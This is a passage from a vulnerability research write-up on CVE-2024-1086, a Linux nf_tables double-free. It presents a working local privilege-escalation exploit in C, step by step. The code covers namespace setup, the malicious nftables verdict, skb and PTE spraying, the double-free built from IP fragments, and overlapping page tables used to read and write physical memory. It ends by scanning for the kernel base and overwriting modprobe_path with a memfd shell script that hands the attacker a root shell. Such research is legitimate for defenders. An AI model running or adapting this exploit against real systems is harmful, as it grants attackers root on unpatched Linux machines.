Please note that ~80MiB for the memory scanning technique is an estimate, and will probably be less in practice; it could even be optimized down to a smaller memory area, because certain targets may reside at certain offsets. For example, kernel code may start at offset +0x0 from the base address, whilst kernel data may always start from e.g. +0x1000000 regardless of the kernel used, because the kernel size remains fairly consistent. Hence, if we were searching for modprobe_path, we could simply start at +0x1000000, but this has not been tested.

5. Proof of Concept

5.1. Execution

Let's breach the mainframe, shall we? The general outline of the exploit can be derived from the diagram below. In this section, I link the subsections to this diagram for clarity.

Note that the exploit in this section refers to the new version, not the original KernelCTF mitigation exploit (the new one works on the mitigation instance as well). That write-up will be published separately in the KernelCTF repository.

Feel free to read along with the source code of the exploit, which is available in my CVE-2024-1086 PoC repository.

Illustration 5.1.1: A bird's-eye execution overview of the exploit stages.

5.1.1. Setting up the environment

To trigger the bug we need to set up a certain network environment and user namespaces.

5.1.1.1. Namespaces

For the LPE exploit, we need the unprivileged user namespaces option enabled to access nf_tables. This is enabled by default on major distros like Debian and Ubuntu. As such, those distributions have a bigger attack surface than distros which do not allow unprivileged user namespaces. This can be checked using sysctl kernel.unprivileged_userns_clone, where 1 means it is enabled:

$ sysctl kernel.unprivileged_userns_clone
kernel.unprivileged_userns_clone = 1

Codeblock 5.1.1.1.1: The CLI command for checking if unprivileged user namespaces are enabled.

We create the required user and network namespaces in the exploit using:

static void do_unshare()
{
    int retv;

    printf("[*] creating user namespace (CLONE_NEWUSER)...\n");
    
	// do unshare separately to make debugging easier
    retv = unshare(CLONE_NEWUSER);
	if (retv == -1) {
        perror("unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    printf("[*] creating network namespace (CLONE_NEWNET)...\n");

    retv = unshare(CLONE_NEWNET);
    if (retv == -1)
	{
		perror("unshare(CLONE_NEWNET)");
		exit(EXIT_FAILURE);
	}
}

Codeblock 5.1.1.1.2: The do_unshare() exploit function written in C, which creates the user and network namespaces.

Afterwards, we give ourselves namespace root access by setting UID/GID mappings using:

static void configure_uid_map(uid_t old_uid, gid_t old_gid)
{
    char uid_map[128];
    char gid_map[128];

    printf("[*] setting up UID namespace...\n");
    
    sprintf(uid_map, "0 %d 1\n", old_uid); 
    sprintf(gid_map, "0 %d 1\n", old_gid);

    // write the uid/gid mappings. setgroups = "deny" to prevent permission error 
    PRINTF_VERBOSE("[*] mapping uid %d to namespace uid 0...\n", old_uid);
    write_file("/proc/self/uid_map", uid_map, strlen(uid_map), 0);

    PRINTF_VERBOSE("[*] denying namespace rights to set user groups...\n");
    write_file("/proc/self/setgroups", "deny", strlen("deny"), 0);

    PRINTF_VERBOSE("[*] mapping gid %d to namespace gid 0...\n", old_gid);
	write_file("/proc/self/gid_map", gid_map, strlen(gid_map), 0);

#if CONFIG_VERBOSE_
    // perform sanity check
    // debug-only since it may be confusing for users
	system("id");
#endif
}

Codeblock 5.1.1.1.3: The configure_uid_map() exploit function written in C, which sets up the user and group mappings.

5.1.1.2. Nftables

In order to trigger the bug, we need to set up hooks/rules with the malicious verdict. I will not display the full code here to prevent clutter, so feel free to check the Github repo. However, I use the function below to set the precise verdict.

// set rule verdict to arbitrary value
static void add_set_verdict(struct nftnl_rule *r, uint32_t val)
{
	struct nftnl_expr *e;

	e = nftnl_expr_alloc("immediate");
	if (e == NULL) {
		perror("expr immediate");
		exit(EXIT_FAILURE);
	}

	nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
	nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, val);

	nftnl_rule_add_expr(r, e);
}

Codeblock 5.1.1.2.1: The add_set_verdict() exploit function written in C, which registers the malicious Netfilter verdict causing the bug.

5.1.1.3. Pre-allocations

Before we start the actual exploitation part of the program, we need to pre-allocate some objects to prevent allocator noise, since there are sensitive stages in the exploit which may fail if there is too much noise in the background. This is not rocket science, and more of a chore than technical magic.

Note the CONFIG_SEC_BEFORE_STORM sleep, which waits for all allocations in the background to finish, in case some allocations are happening across CPUs. This considerably slows down the exploit (1 second -> 11 seconds), but it definitively increases exploit stability on systems where there may be a lot of background noise. Ironically enough, the success rate increased from 93% to 99.4% (n=1000) without the sleep on systems with barely any workload (like the kernelctf image), so play around with this value as you like.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
	unsigned long long *pte_area;
	void *_pmd_area;
	void *pmd_kernel_area;
	void *pmd_data_area;
	struct ip df_ip_header = {
		.ip_v = 4,
		.ip_hl = 5,
		.ip_tos = 0,
		.ip_len = 0xDEAD,
		.ip_id = 0xDEAD, 
		.ip_off = 0xDEAD,
		.ip_ttl = 128,
		.ip_p = 70,
		.ip_src.s_addr = inet_addr("1.1.1.1"),
		.ip_dst.s_addr = inet_addr("255.255.255.255"),
	};
	char modprobe_path[KMOD_PATH_LEN] = { '\x00' };

	get_modprobe_path(modprobe_path, KMOD_PATH_LEN);

	printf("[+] running normal privesc\n");

    PRINTF_VERBOSE("[*] doing first useless allocs to setup caching and stuff...\n");

	pin_cpu(0);

	// allocate PUD (and a PMD+PTE) for PMD
	mmap((void*)PTI_TO_VIRT(1, 0, 0, 0, 0), 0x2000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	*(unsigned long long*)PTI_TO_VIRT(1, 0, 0, 0, 0) = 0xDEADBEEF;

	// pre-register sprayed PTEs, with 0x1000 * 2, so 2 PTEs fit inside when overlapping with PMD
	// needs to be minimal since VMA registration costs memory
	for (unsigned long long i=0; i < CONFIG_PTE_SPRAY_AMOUNT; i++)
	{
		void *retv = mmap((void*)PTI_TO_VIRT(2, 0, i, 0, 0), 0x2000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);

		if (retv == MAP_FAILED)
		{
			perror("mmap");
			exit(EXIT_FAILURE);
		}
	}

	// pre-allocate PMDs for sprayed PTEs
	// PTE_SPRAY_AMOUNT / 512 = PMD_SPRAY_AMOUNT: PMD contains 512 PTE children
	for (unsigned long long i=0; i < CONFIG_PTE_SPRAY_AMOUNT / 512; i++)
		*(char*)PTI_TO_VIRT(2, i, 0, 0, 0) = 0x41;
	
	// these use different PTEs but the same PMD
	_pmd_area = mmap((void*)PTI_TO_VIRT(1, 1, 0, 0, 0), 0x400000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	pmd_kernel_area = _pmd_area;
	pmd_data_area = _pmd_area + 0x200000;

	PRINTF_VERBOSE("[*] allocated VMAs for process:\n  - pte_area: ?\n  - _pmd_area: %p\n  - modprobe_path: '%s' @ %p\n", _pmd_area, modprobe_path, modprobe_path);

	populate_sockets();

	set_ipfrag_time(1);

	// cause socket/networking-related objects to be allocated
	df_ip_header.ip_id = 0x1336;
	df_ip_header.ip_len = sizeof(struct ip)*2 + 32768 + 8 + 4000;
	df_ip_header.ip_off = ntohs((8 >> 3) | 0x2000);
	alloc_intermed_buf_hdr(32768 + 8, &df_ip_header);

	set_ipfrag_time(9999);

	printf("[*] waiting for the calm before the storm...\n");
	sleep(CONFIG_SEC_BEFORE_STORM);

    // ... (rest of the exploit)
}

Codeblock 5.1.1.3.1: Partial code for the exploit written in C, which pre-allocates objects to reduce noise on the kernel page allocators.

5.1.2. Performing double-free

Performing the double-free is the most tricky part of the exploit as we need to play with IPv4 networking code and the page allocators. In this section we will perform it so we can obtain arbitrary, unlimited r/w to any physical memory page with Dirty Pagedirectory in the next section, which is ironically enough a lot easier.

5.1.2.1. Reserving clean skb's for masking

In order to allocate skb's before the double-free (which we free in between the two frees to avoid detection and for stability), the exploit sends UDP packets to its own UDP listener socket. Until the UDP listener recv()'s the packets, they will remain in memory as separate skb's.

void send_ipv4_udp(const char* buf, size_t buflen)
{
    struct sockaddr_in dst_addr = {
		.sin_family = AF_INET,
        .sin_port = htons(45173),
		.sin_addr.s_addr = inet_addr("127.0.0.1")
	};

	sendto_noconn(&dst_addr, buf, buflen, sendto_ipv4_udp_client_sockfd);
}

Codeblock 5.1.2.1.1: The send_ipv4_udp() exploit function written in C, which abstracts away networking data.

static void alloc_ipv4_udp(size_t content_size)
{
	PRINTF_VERBOSE("[*] sending udp packet...\n");
	memset(intermed_buf, '\x00', content_size);
	send_ipv4_udp(intermed_buf, content_size);
}

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (setup code)

    // pop N skbs from skb freelist
	for (int i=0; i < CONFIG_SKB_SPRAY_AMOUNT; i++)
	{
		PRINTF_VERBOSE("[*] reserving udp packets... (%d/%d)\n", i, CONFIG_SKB_SPRAY_AMOUNT);
		alloc_ipv4_udp(1);
	}

    // ... (rest of the exploit)
}

Codeblock 5.1.2.1.2: Partial code for the exploit written in C, which allocates UDP packets to spray sk_buff objects for later freeing.

5.1.2.2. Triggering double-free 1st free

In order to trigger the double-free, I send an IP packet which triggers the nftables rule we set up earlier. It uses an arbitrary protocol other than TCP and UDP, because those would get passed on to the TCP/UDP handler code, which would panic the kernel due to the data corruption.

Note the usage of the IP_MF flag (0x2000) in the offset field of the IP header, which we use to force the skb into an IP fragment queue, and to free the skb at will later by sending the "completing" fragment. Also note that the size of this skb determines the double-free size: if we allocate a packet with 0 bytes of content, the allocated skb head object will be in kmalloc-256 (because of metadata), but if we allocate a packet with 32768 bytes, it will be an order-4 allocation (16 pages from the buddy allocator).

static char intermed_buf[1 << 19]; // simply pre-allocate intermediate buffers

static int sendto_ipv4_ip_sockfd;

void send_ipv4_ip_hdr(const char* buf, size_t buflen, struct ip *ip_header)
{
	size_t ip_buflen = sizeof(struct ip) + buflen;
    struct sockaddr_in dst_addr = {
		.sin_family = AF_INET,
		.sin_addr.s_addr =  inet_addr("127.0.0.2")  // 127.0.0.1 will not be ipfrag_time'd. this can't be set to 1.1.1.1 since C runtime will prob catch it
	};

    memcpy(intermed_buf, ip_header, sizeof(*ip_header));
	memcpy(&intermed_buf[sizeof(*ip_header)], buf, buflen);

	// checksum needs to be 0 before computing it
	((struct ip*)intermed_buf)->ip_sum = 0;
	((struct ip*)intermed_buf)->ip_sum = ip_finish_sum(ip_checksum(intermed_buf, ip_buflen, 0));

	PRINTF_VERBOSE("[*] sending IP packet (%ld bytes)...\n", ip_buflen);

	sendto_noconn(&dst_addr, intermed_buf, ip_buflen, sendto_ipv4_ip_sockfd);
}

Codeblock 5.1.2.2.1: The send_ipv4_ip_hdr() exploit function written in C, which abstracts away checksumming and socket code, when trying to send a raw IP packet.

static char intermed_buf[1 << 19];

static void send_ipv4_ip_hdr_chr(size_t dfsize, struct ip *ip_header, char chr)
{
	memset(intermed_buf, chr, dfsize);
	send_ipv4_ip_hdr(intermed_buf, dfsize, ip_header);
}

static void trigger_double_free_hdr(size_t dfsize, struct ip *ip_header)
{
	printf("[*] sending double free buffer packet...\n");
	send_ipv4_ip_hdr_chr(dfsize, ip_header, '\x41');
}

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (skb spray)

    // allocate and free 1 skb from freelist
	df_ip_header.ip_id = 0x1337;
	df_ip_header.ip_len = sizeof(struct ip)*2 + 32768 + 24;
	df_ip_header.ip_off = ntohs((0 >> 3) | 0x2000);  // wait for other fragments. 8 >> 3 to make it wait or so?
	trigger_double_free_hdr(32768 + 8, &df_ip_header);

    // ... (rest of the exploit)
}

Codeblock 5.1.2.2.2: Partial code for the exploit written in C, which sends the raw IP packet and triggers the nf_tables rule we set up earlier.

5.1.2.3. Masking the double-free with skb's

In order to prevent detection of the double-free and to improve stability of the exploit, we spray-free the UDP packets we allocated earlier.

static char intermed_buf[1 << 19]; // simply pre-allocate intermediate buffers

static int sendto_ipv4_udp_server_sockfd;

void recv_ipv4_udp(int content_len)
{
    PRINTF_VERBOSE("[*] doing udp recv...\n");
    recv(sendto_ipv4_udp_server_sockfd, intermed_buf, content_len, 0);

	PRINTF_VERBOSE("[*] udp packet preview: %02hhx\n", intermed_buf[0]);
}

Codeblock 5.1.2.3.1: The recv_ipv4_udp() exploit function written in C, which abstracts away socket code when receiving a UDP packet.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (trigger doublefree)

	// push N skbs to skb freelist
	for (int i=0; i < CONFIG_SKB_SPRAY_AMOUNT; i++)
	{
		PRINTF_VERBOSE("[*] freeing reserved udp packets to mask corrupted packet... (%d/%d)\n", i, CONFIG_SKB_SPRAY_AMOUNT);
		recv_ipv4_udp(1);
	}

    // ... (rest of the exploit)
}

Codeblock 5.1.2.3.2: Partial code for the exploit written in C, which frees the previously allocated sk_buff objects.

5.1.2.4. Spraying PTEs

In order to spray PTEs we simply access the virtual memory pages in the VMAs we registered earlier. Note that a PTE page contains 512 entries, and therefore covers 0x20'0000 bytes. Hence, we access one page every 0x20'0000 bytes, a total of CONFIG_PTE_SPRAY_AMOUNT times.

In order to simplify this process, I wrote a macro which converts pagetable indices to virtual memory addresses. I.e. mm->pgd[pud_nr][pmd_nr][pte_nr][page_nr] is responsible for virtual memory page PTI_TO_VIRT(pud_nr, pmd_nr, pte_nr, page_nr, 0). For example, mm->pgd[1][0][0][0] refers to the virtual memory page at 0x80'0000'0000.

#define _pte_index_to_virt(i) (i << 12)
#define _pmd_index_to_virt(i) (i << 21)
#define _pud_index_to_virt(i) (i << 30)
#define _pgd_index_to_virt(i) (i << 39)
#define PTI_TO_VIRT(pud_index, pmd_index, pte_index, page_index, byte_index) \
	((void*)(_pgd_index_to_virt((unsigned long long)(pud_index)) + _pud_index_to_virt((unsigned long long)(pmd_index)) + \
	_pmd_index_to_virt((unsigned long long)(pte_index)) + _pte_index_to_virt((unsigned long long)(page_index)) + (unsigned long long)(byte_index)))


static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (spray-free skb's)

	// spray-allocate the PTEs from PCP allocator order-0 list
	printf("[*] spraying %d pte's...\n", CONFIG_PTE_SPRAY_AMOUNT);
	for (unsigned long long i=0; i < CONFIG_PTE_SPRAY_AMOUNT; i++)
		*(char*)PTI_TO_VIRT(2, 0, i, 0, 0) = 0x41;
     
    // ... (rest of the exploit)
}

Codeblock 5.1.2.4.1: Partial code for the exploit written in C, which sprays PTE pages and defines a macro to convert pagetable indices to virtual addresses.

5.1.2.5. Triggering double-free free 2

We previously drained the PCP list and allocated a bunch of PTEs, one of which occupies the page we freed with free 1. Now, we will perform free 2 so we can use its page freelist entry to allocate an overlapping PMD.

We need to use a very specific combination of IP header options to circumvent certain checks in the IPv4 fragment queue code. For specific details, check the relevant background info and/or technique sections.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (spray-alloc PTEs)

	PRINTF_VERBOSE("[*] double-freeing skb...\n");

	// cause double-free on skb from earlier
	df_ip_header.ip_id = 0x1337;
	df_ip_header.ip_len = sizeof(struct ip)*2 + 32768 + 24;
	df_ip_header.ip_off = ntohs(((32768 + 8) >> 3) | 0x2000);
	
	// skb1->len gets overwritten by s->random() in set_freepointer(). need to discard queue with tricks circumventing skb1->len
	// causes end == offset in ip_frag_queue(). packet will be empty
	// remains running until after both frees, a.k.a. does not require sleep
	alloc_intermed_buf_hdr(0, &df_ip_header);

    // ... (rest of the exploit)
}

Codeblock 5.1.2.5.1: Partial code for the exploit written in C, which triggers the 2nd free of the double-free and navigates a specific IP fragment queue.

5.1.2.6. Allocating the PMD

Now that we have the 2nd freelist entry to the double-freed page (note that the page has already been allocated by the PTE, so there are never 2 freelist entries at the same time), we can allocate the overlapping PMD on this page. Fortunately, this is as simple as writing to the PMD area, which makes the kernel allocate a PMD page for it.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (free 2 of skb)

	// allocate overlapping PMD page (overlaps with PTE)
	*(unsigned long long*)_pmd_area = 0xCAFEBABE;

    // ... (rest of the exploit)
}

Codeblock 5.1.2.6.1: Partial code for the exploit written in C, which allocates the overlapping PMD page by writing to a userland page.

5.1.2.7. Finding the overlapping PTE

Now that we have an overlapping PMD and PTE somewhere, we need to find out which of the sprayed PTEs is the overlapping one. This is a very easy procedure as well: we check which of the PTE areas has a PTE entry belonging to the PMD area, which boils down to checking whether the value differs from the original one, indicating the page was overwritten.

In case we want to perform a manual sanity check, we also map physical address 0x0 and print its contents to the user. This page usually belongs to MMIO devices, but tends to look the same across systems.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (allocate the overlapping PMD page)

	printf("[*] checking %d sprayed pte's for overlap...\n", CONFIG_PTE_SPRAY_AMOUNT);

	// find overlapped PTE area
	pte_area = NULL;
	for (unsigned long long i=0; i < CONFIG_PTE_SPRAY_AMOUNT; i++)
	{
		unsigned long long *test_target_addr = PTI_TO_VIRT(2, 0, i, 0, 0);

		// pte entry pte[0] should be the PFN+flags for &_pmd_area
		// if this is the double allocated PTE, the value is PFN+flags, not 0x41
		if (*test_target_addr != 0x41)
		{
			printf("[+] confirmed double alloc PMD/PTE\n");
			PRINTF_VERBOSE("    - PTE area index: %lld\n", i);
			PRINTF_VERBOSE("    - PTE area (write target address/page): %016llx (new)\n", *test_target_addr);
			pte_area = test_target_addr;
		}
	}

	if (pte_area == NULL)
	{
		printf("[-] failed to detect overwritten pte: is more PTE spray needed? pmd: %016llx\n", *(unsigned long long*)_pmd_area);

		return;
	}

    // set new pte value for sanity check
	*pte_area = 0x0 | 0x8000000000000867;

	flush_tlb(_pmd_area, 0x400000);
	PRINTF_VERBOSE("    - PMD area (read target value/page): %016llx (new)\n", *(unsigned long long*)_pmd_area);

    // (rest of the exploit)
}

Codeblock 5.1.2.7.1: Partial code for the exploit written in C, which scans the sprayed PTE areas to find the one overlapping with the PMD area.

5.1.3. Scanning physical memory

After we have set up the PMD+PTE double alloc, we can leverage the true potential of Dirty Pagedirectory: a kernel-space mirroring attack (KSMA) entirely from userland. We can now write physical addresses as PTE entries to a certain address within the PTE area, and then "dereference" them as normal pages of memory in the PMD area.

In this section, we will acquire the physical kernel base address and then use that to access the modprobe_path kernel variable with read/write privileges.

5.1.3.1. Finding kernel base address

Here, we apply the aforementioned physical KASLR bypass to find the physical kernel base. Assuming a device with 8GiB physical memory, this reduces the memory that needs to be scanned from 8GiB to 512 candidate pages (2MiB worth of pages). Thankfully, we only need around ~40 bytes per page to decide if it is the kernel base, which means we need to read 512 * 40 = 20,480 bytes in the worst case to find the kernel base.

In order to determine if a page is the kernel base, I wrote the get-sig Python scripts, which find common bytes at the same addresses (signatures), filter out the signatures which are common elsewhere in physical memory, and convert them into a memcmp statement. By increasing the number of kernel samples, we can extend support to other kernels (i.e. other compilers and older versions). The output looks something like the codeblock below.

static int is_kernel_base(unsigned char *addr)
{
	// thanks python
	
	// get-sig kernel_runtime_1
	if (memcmp(addr + 0x0, "\x48\x8d\x25\x51\x3f", 5) == 0 &&
			memcmp(addr + 0x7, "\x48\x8d\x3d\xf2\xff\xff\xff", 7) == 0)
		return 1;

	// get-sig kernel_runtime_2
	if (memcmp(addr + 0x0, "\xfc\x0f\x01\x15", 4) == 0 &&
			memcmp(addr + 0x8, "\xb8\x10\x00\x00\x00\x8e\xd8\x8e\xc0\x8e\xd0\xbf", 12) == 0 &&
			memcmp(addr + 0x18, "\x89\xde\x8b\x0d", 4) == 0 &&
			memcmp(addr + 0x20, "\xc1\xe9\x02\xf3\xa5\xbc", 6) == 0 &&
			memcmp(addr + 0x2a, "\x0f\x20\xe0\x83\xc8\x20\x0f\x22\xe0\xb9\x80\x00\x00\xc0\x0f\x32\x0f\xba\xe8\x08\x0f\x30\xb8\x00", 24) == 0 &&
			memcmp(addr + 0x45, "\x0f\x22\xd8\xb8\x01\x00\x00\x80\x0f\x22\xc0\xea\x57\x00\x00", 15) == 0 &&
			memcmp(addr + 0x55, "\x08\x00\xb9\x01\x01\x00\xc0\xb8", 8) == 0 &&
			memcmp(addr + 0x61, "\x31\xd2\x0f\x30\xe8", 5) == 0 &&
			memcmp(addr + 0x6a, "\x48\xc7\xc6", 3) == 0 &&
			memcmp(addr + 0x71, "\x48\xc7\xc0\x80\x00\x00", 6) == 0 &&
			memcmp(addr + 0x78, "\xff\xe0", 2) == 0)
		return 1;


	return 0;
}

Codeblock 5.1.3.1.1: The is_kernel_base() exploit function written in C, which compares memory against signatures of the kernel base.

Now, it is time to scan. We fill the PTE page (which overlaps with the PMD page responsible for pmd_kernel_area) with entries for all 512 pages which could be the kernel base page. If we have to scan more than 512 pages, we simply put the code in a loop with an incrementing PFN (physical address).

To reiterate: it is 512 pages because we are dealing with 8GiB physical memory. If it were 4GiB, it would be 256 pages, since 4GiB / CONFIG_PHYSICAL_ALIGN = 256.

When we are setting the PTE entry in the PTE page (pte_area[j] = (CONFIG_PHYSICAL_ALIGN * j) | 0x8000000000000867;), we are setting both the PFN (CONFIG_PHYSICAL_ALIGN * j), which can be considered the physical address, and the corresponding flags (0x8000000000000867), such as the permissions of said page (i.e. read/write).

Remember from the Dirty Pagedirectory section that because of the double-free: mm->pgd[0][1] (PMD) == mm->pgd[0][2][0] (PTE), and therefore mm->pgd[0][1][x] (PTE) == mm->pgd[0][2][0][x] (userland page) with x = 0->511. This means that we can overwrite 512 PTEs in the overlapping PMD with the 512 userland pages. These 512 PTEs each cover another 512 userland pages, which means we can map 512 * 512 * 0x1000 = 0x4000'0000 (1GiB) of memory at a time.

For readability, I utilize only 2 of these 512 PTEs, and use them respectively as pmd_kernel_area (for scanning kernel base candidates) and pmd_data_area (for scanning kernel memory content).

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (setup dirty pagedirectory)

	// range = (k * j) * CONFIG_PHYSICAL_ALIGN
	// scan 512 pages (1 PTE worth) for kernel base each iteration
	for (int k=0; k < (CONFIG_PHYS_MEM / (CONFIG_PHYSICAL_ALIGN * 512)); k++)
	{
		unsigned long long kernel_iteration_base;

		kernel_iteration_base = k * (CONFIG_PHYSICAL_ALIGN * 512);

		PRINTF_VERBOSE("[*] setting kernel physical address range to 0x%016llx - 0x%016llx\n", kernel_iteration_base, kernel_iteration_base + CONFIG_PHYSICAL_ALIGN * 512);
		for (unsigned short j=0; j < 512; j++)
			pte_area[j] = (kernel_iteration_base + CONFIG_PHYSICAL_ALIGN * j) | 0x8000000000000867;

		flush_tlb(_pmd_area, 0x400000);

		// scan 1 page (instead of CONFIG_PHYSICAL_ALIGN) for kernel base each iteration
		for (unsigned long long j=0; j < 512; j++) 
		{
			unsigned long long phys_kernel_base;
		
			// check for x64-gcc/clang signatures of kernel code segment at rest and at runtime
			// - this "kernel base" is actually the assembly bytecode of start_64() and variants
			// - it's different per architecture and per compiler (clang produces different signature than gcc)
			// - this can be derived from the vmlinux file by checking the second segment, which starts likely at binary offset 0x200000
			//   - i.e: xxd ./vmlinux | grep '00200000:'
			
			phys_kernel_base = kernel_iteration_base + CONFIG_PHYSICAL_ALIGN * j;

			PRINTF_VERBOSE("[*] phys kernel addr: %016llx, val: %016llx\n", phys_kernel_base, *(unsigned long long*)(pmd_kernel_area + j * 0x1000));

			if (is_kernel_base(pmd_kernel_area + j * 0x1000) == 0)
				continue;

            // ... (rest of the exploit)
		}
	}

	printf("[!] failed to find kernel code segment... TLB flush fail?\n");
	return;
}

Codeblock 5.1.3.1.2: A part of the privesc_flh_bypass_no_time() exploit function written in C, where it searches for the physical kernel base address.

5.1.3.2. Finding modprobe_path

Now that we have found the physical kernel base address, we will scan the memory beyond it. In order to identify modprobe_path, we scan for CONFIG_MODPROBE_PATH ("/sbin/modprobe") padded with '\x00' bytes up to KMOD_PATH_LEN (256) bytes. We can verify that this address is correct by overwriting it and checking if /proc/sys/kernel/modprobe reflects the change, as that file is a direct reference to modprobe_path.

Alternatively, the static usermode helper mitigation may be enabled. Fortunately for us, this can be bypassed as well: instead of searching for "/sbin/modprobe", we simply search for CONFIG_STATIC_USERMODEHELPER_PATH ("/sbin/usermode-helper"). Unfortunately, there is no method to verify that this is the correct instance, but there should only be one match.

Then, when the target is found, we will try to overwrite it. If it fails, we will simply continue scanning for another target match.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ...

	// range = (k * j) * CONFIG_PHYSICAL_ALIGN
	// scan 512 pages (1 PTE worth) for kernel base each iteration
	for (int k=0; k < (CONFIG_PHYS_MEM / (CONFIG_PHYSICAL_ALIGN * 512)); k++)
	{
		unsigned long long kernel_iteration_base;

        // ... (set 512 PTE entries in 1 PTE page)

		// scan 1 page (instead of CONFIG_PHYSICAL_ALIGN) for kernel base each iteration
		for (unsigned long long j=0; j < 512; j++) 
		{
			unsigned long long phys_kernel_base;

            // ... (find physical kernel base address)

			// scan 40 * 0x200000 (2MiB) = 0x5000000 (80MiB) bytes from kernel base for modprobe path. if not found, just search for another kernel base
			for (int i=0; i < 40; i++) 
			{
				void *pmd_modprobe_addr;
				unsigned long long phys_modprobe_addr;
				unsigned long long modprobe_iteration_base;

				modprobe_iteration_base = phys_kernel_base + i * 0x200000;

				PRINTF_VERBOSE("[*] setting physical address range to 0x%016llx - 0x%016llx\n", modprobe_iteration_base, modprobe_iteration_base + 0x200000);

				// set the pages for the other threads PUD data range to kernel memory
				for (unsigned short j=0; j < 512; j++)
					pte_area[512 + j] = (modprobe_iteration_base + 0x1000 * j) | 0x8000000000000867;

				flush_tlb(_pmd_area, 0x400000);
				
#if CONFIG_STATIC_USERMODEHELPER
				pmd_modprobe_addr = memmem(pmd_data_area, 0x200000, CONFIG_STATIC_USERMODEHELPER_PATH, strlen(CONFIG_STATIC_USERMODEHELPER_PATH));
#else
				pmd_modprobe_addr = memmem_modprobe_path(pmd_data_area, 0x200000, modprobe_path, KMOD_PATH_LEN);
#endif
				if (pmd_modprobe_addr == NULL)
					continue;

#if CONFIG_LEET
				breached_the_mainframe();
#endif

				phys_modprobe_addr = modprobe_iteration_base + (pmd_modprobe_addr - pmd_data_area);
				printf("[+] verified modprobe_path/usermodehelper_path: %016llx ('%s')...\n", phys_modprobe_addr, (char*)pmd_modprobe_addr);

                // ... (rest of the exploit)
			}
			
			printf("[-] failed to find correct modprobe_path: trying to find new kernel base...\n");
		}
	}

	printf("[!] failed to find kernel code segment... TLB flush fail?\n");
	return;
}

Codeblock 5.1.3.2.1: A part of the privesc_flh_bypass_no_time() exploit function written in C, where it searches for the physical modprobe_path address.

5.1.4. Overwriting modprobe_path

Finally: we have read/write access to modprobe_path. Sadly, there's one final challenge left: getting the "real" PID of the exploit process, so we can execute /proc/<pid>/fd/<fd> (the file descriptor containing the privesc script). Checking whether or not it succeeded is done in the next section.

Even if we were using on-disk files, the exploit would need to know the PID, since we would need to use /proc/<pid>/cwd if we were in a mnt namespace. Of course in practice there are ways to circumvent this - such as using the PID shown in the kernel warning message - but I wanted to make this exploit as universal as possible.

As you can see in the codeblock below, we overwrite modprobe_path or the static usermode helper string with "/proc/<pid>/fd/<script_fd>", which refers to the privilege escalation script, mentioned in the next sections.

Note that the privilege escalation script (included in this codeblock) uses the current PID guess both for the shell redirections and for checking whether the guess was correct.

#define MEMCPY_HOST_FD_PATH(buf, pid, fd) sprintf((buf), "/proc/%u/fd/%u", (pid), (fd));

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ...

	// run this script instead of /sbin/modprobe
	int modprobe_script_fd = memfd_create("", MFD_CLOEXEC);
	int status_fd = memfd_create("", 0);

	// range = (k * j) * CONFIG_PHYSICAL_ALIGN
	// scan 512 pages (1 PTE worth) for kernel base each iteration
	for (int k=0; k < (CONFIG_PHYS_MEM / (CONFIG_PHYSICAL_ALIGN * 512)); k++)
	{
		// scan 1 page (instead of CONFIG_PHYSICAL_ALIGN) for kernel base each iteration
		for (unsigned long long j=0; j < 512; j++) 
		{
			// scan 40 * 0x200000 (2MiB) = 0x5000000 (80MiB) bytes from kernel base for modprobe path. if not found, just search for another kernel base
			for (int i=0; i < 40; i++) 
			{
				void *pmd_modprobe_addr;
				unsigned long long phys_modprobe_addr;
				unsigned long long modprobe_iteration_base;

                // ... (find modprobe_path)

				PRINTF_VERBOSE("[*] modprobe_script_fd: %d, status_fd: %d\n", modprobe_script_fd, status_fd);
				
				printf("[*] overwriting path with PIDs in range 0->4194304...\n");
				for (pid_t pid_guess=0; pid_guess < 4194304; pid_guess++)
				{
					int status_cnt;
					char buf;

					// overwrite the `modprobe_path` kernel variable to "/proc/<pid>/fd/<script_fd>"
					// - use /proc/<pid>/* since container path may differ, may not be accessible, et cetera
					// - it must be root namespace PIDs, and can't get the root ns pid from within other namespace
					MEMCPY_HOST_FD_PATH(pmd_modprobe_addr, pid_guess, modprobe_script_fd);

					if (pid_guess % 50 == 0)
					{
						PRINTF_VERBOSE("[+] overwriting modprobe_path with different PIDs (%u-%u)...\n", pid_guess, pid_guess + 50);
						PRINTF_VERBOSE("    - i.e. '%s' @ %p...\n", (char*)pmd_modprobe_addr, pmd_modprobe_addr);
						PRINTF_VERBOSE("    - matching modprobe_path scan var: '%s' @ %p)...\n", modprobe_path, modprobe_path);
					}
						
					lseek(modprobe_script_fd, 0, SEEK_SET); // overwrite previous entry
					dprintf(modprobe_script_fd, "#!/bin/sh\necho -n 1 1>/proc/%u/fd/%u\n/bin/sh 0</proc/%u/fd/%u 1>/proc/%u/fd/%u 2>&1\n", pid_guess, status_fd, pid_guess, shell_stdin_fd, pid_guess, shell_stdout_fd);

					// ... (rest of the exploit)
				}

				printf("[!] verified modprobe_path address does not work... CONFIG_STATIC_USERMODEHELPER enabled?\n");

				return;
			}
			
			printf("[-] failed to find correct modprobe_path: trying to find new kernel base...\n");
		}
	}

	printf("[!] failed to find kernel code segment... TLB flush fail?\n");
	return;
}

